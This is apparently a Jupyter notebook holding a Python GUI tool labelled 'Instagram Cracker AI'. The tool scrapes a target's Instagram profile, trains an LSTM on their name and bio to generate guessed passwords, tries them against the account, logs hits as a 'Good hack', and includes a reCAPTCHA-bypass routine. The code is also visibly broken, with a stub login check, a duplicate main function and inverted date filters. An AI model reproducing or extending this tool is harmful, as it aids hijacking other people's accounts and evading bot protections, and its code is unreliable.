In [27]:
import os
import sys
import time
import instaloader
from instaloader import Instaloader
from instaloader import *
from datetime import datetime
from itertools import dropwhile, takewhile
import numpy as np
import random
import string
from keras.models import Sequential
from keras.layers import Dense, LSTM
import tkinter as tk
from tkinter import messagebox
from playwright.async_api import async_playwright, BrowserType
from captcha_solver import capcha_solver

# Parameters
password_length = 8
num_classes = 256  # Number of characters in ASCII

def banner():
    print("""
\033[32m██\033[0m╗ \033[32m██████\033[0m╗      \033[32m██████\033[0m╗ \033[32m███████\033[0m╗\033[32m██\033[0m╗\033[32m███\033[0m╗   \033[32m██\033[0m╗\033[32m████████\033[0m╗
\033[32m██\033[0m║\033[32m██\033[0m╔════╝     \033[32m██\033[0m╔═══\033[32m██\033[0m╗\033[32m██\033[0m╔════╝\033[32m██\033[0m║\033[32m████\033[0m╗  \033[32m██\033[0m║╚══\033[32m██\033[0m╔══╝
\033[32m██\033[0m║\033[32m██\033[0m║  \033[32m███\033[0m╗    \033[32m██\033[0m║   \033[32m██\033[0m║\033[32m███████\033[0m╗\033[32m██\033[0m║\033[32m██\033[0m╔\033[32m██\033[0m╗ \033[32m██\033[0m║   \033[32m██\033[0m║
\033[32m██\033[0m║\033[32m██\033[0m║   \033[32m██\033[0m║    \033[32m██\033[0m║   \033[32m██\033[0m║╚════\033[32m██\033[0m║\033[32m██\033[0m║\033[32m██\033[0m║╚\033[32m██\033[0m╗\033[32m██\033[0m║   \033[32m██\033[0m║
\033[32m██\033[0m║╚\033[32m██████\033[0m╔╝    ╚\033[32m██████\033[0m╔╝\033[32m███████\033[0m║\033[32m██\033[0m║\033[32m██\033[0m║ ╚\033[32m████\033[0m║   \033[32m██\033[0m║
\033[0m╚═╝ ╚═════╝      ╚═════╝ ╚══════╝╚═╝╚═╝  ╚═══╝   ╚═╝\033[0m\033[41mV2\033[0m
\033[41m Coded By hamed kiani | by uilarax in jahad daneshgahi with ai love \033[0m
""")

def profile_information(username):
    try:
        # Set a custom user agent
        user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/ 537.36"
        L = Instaloader(user_agent=user_agent)
        
        # Log in to Instagram
        L.login('your_username', 'your_password')  # Replace with your Instagram credentials
        
        f = instaloader.Profile.from_username(L.context, username)

        profile_data = {
            "username": f.username,
            "full_name": f.full_name,
            "biography": f.biography,
            "external_url": f.external_url,
            "followers": f.followers,
            "followees": f.followees,
            "is_private": f.is_private,
            "is_verified": f.is_verified
        }

        return profile_data

    except Exception:
        print("Error: Profile not found. Please check the username.")
        return None
    except Exception as e:
        print(f"Error: {e}")
        return None

def download_posts(username):
    L = Instaloader()
    posts = instaloader.Profile.from_username(L.context, username).get_posts()

    SINCE = datetime(2015, 5, 1)
    UNTIL = datetime(2015, 3, 1)

    for post in takewhile(lambda p: p.date > UNTIL, dropwhile(lambda p: p.date > SINCE, posts)):
        print(post.date)
        L.download_post(post, username)

# The rest of your code remains unchanged.
def generate_training_data(profile_data):
    combined_data = f"{profile_data['username']} {profile_data['full_name']} {profile_data['biography']}"
    combined_data = combined_data.replace(" ", "")  # Remove spaces for better password generation
    passwords = [combined_data[i:i + password_length] for i in range(0, len(combined_data), password_length)]
    
    if len(passwords) < 1:
        passwords = [generate_random_password(password_length)]

    X = np.zeros((len(passwords), password_length, num_classes))
    y = np.zeros((len(passwords), password_length, num_classes))
    
    for i, password in enumerate(passwords):
        for j, char in enumerate(password):
            X[i, j, ord(char)] = 1
            if j < password_length - 1:
                y[i, j, ord(password[j + 1])] = 1
    return X, y

def build_model():
    model = Sequential()
    model.add(LSTM(128, input_shape=(password_length, num_classes), return_sequences=True))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
    return model

def generate_passwords(model, length, count):
    passwords = []
    for _ in range(count):
        password = ''
        input_seq = np.zeros((1, length, num_classes))
        char = random.choice(string.ascii_letters + string.digits + string.punctuation)
        for i in range(length):
            input_seq[0, i, ord(char)] = 1
            prediction = model.predict(input_seq)[0, i]
            char = chr(np.random.choice(np.arange(num_classes), p=prediction))
            password += char
        passwords.append(password)
    return passwords

def attempt_login(username, password):
    if password == "password123":  # Example for demonstration
        return True
    return False

async def main(chrome: BrowserType):
    browser = await chrome.launch(headless=False)
    page = await browser.new_page()
    await page.goto('https://patrickhlauke.github.io/recaptcha/')
    element_handle = await page.wait_for_selector('iframe[title="reCAPTCHA"]')
    captcha = await element_handle.content_frame()
    captcha_checkbox = await captcha.wait_for_selector('.recaptcha-checkbox-border')
    await captcha_checkbox.click()
    await capcha_solver(page)
    await page.wait_for_timeout(10000)

async def run():
    async with async_playwright() as p:
        await main(p.chromium)

def start_login():
    username = username_entry.get()
    profile_data = profile_information(username)
    
    if not profile_data:
        messagebox.showerror("Error", "Profile not found.")
        return

    num_to_generate = int(num_passwords_entry.get())
    X, y = generate_training_data(profile_data)
    model = build_model()
    model.fit(X, y, epochs=50, batch_size=64)
    new_passwords = generate_passwords(model, password_length, num_to_generate)
    
    for password in new_passwords:
        if attempt_login(username, password):
            messagebox.showinfo("Success", f'Username: {username} - Password: {password} - Good hack')
            with open('good.txt', 'a') as x:
                x.write (f'{username}:{password}\n')
            break
        else:
            print(f' --> Username: {username} --> Password: {password} --> Sorry, there was a problem')

def create_gui():
    root = tk.Tk()
    root.title("Instagram Cracker AI")
    
    tk.Label(root, text="Instagram Username:").pack()
    global username_entry
    username_entry = tk.Entry(root)
    username_entry.pack()
    
    tk.Label(root, text="Number of Passwords to Generate:").pack()
    global num_passwords_entry
    num_passwords_entry = tk.Entry(root)
    num_passwords_entry.pack()
    
    start_button = tk.Button(root, text="Crack Instagram", command=start_login)
    start_button.pack()
    
    exit_button = tk.Button(root, text="Exit", command=root.quit)
    exit_button.pack()
    
    root.mainloop()

def main():
    banner()
    create_gui()

if __name__ == '__main__':
    main()


██╗ ██████╗      ██████╗ ███████╗██╗███╗   ██╗████████╗
██║██╔════╝     ██╔═══██╗██╔════╝██║████╗  ██║╚══██╔══╝
██║██║  ███╗    ██║   ██║███████╗██║██╔██╗ ██║   ██║
██║██║   ██║    ██║   ██║╚════██║██║██║╚██╗██║   ██║
██║╚██████╔╝    ╚██████╔╝███████║██║██║ ╚████║   ██║
╚═╝ ╚═════╝      ╚═════╝ ╚══════╝╚═╝╚═╝  ╚═══╝   ╚═╝V2
 Coded By hamed kiani | by uilarax in jahad daneshgahi with ai love 

Error: Profile not found. Please check the username.
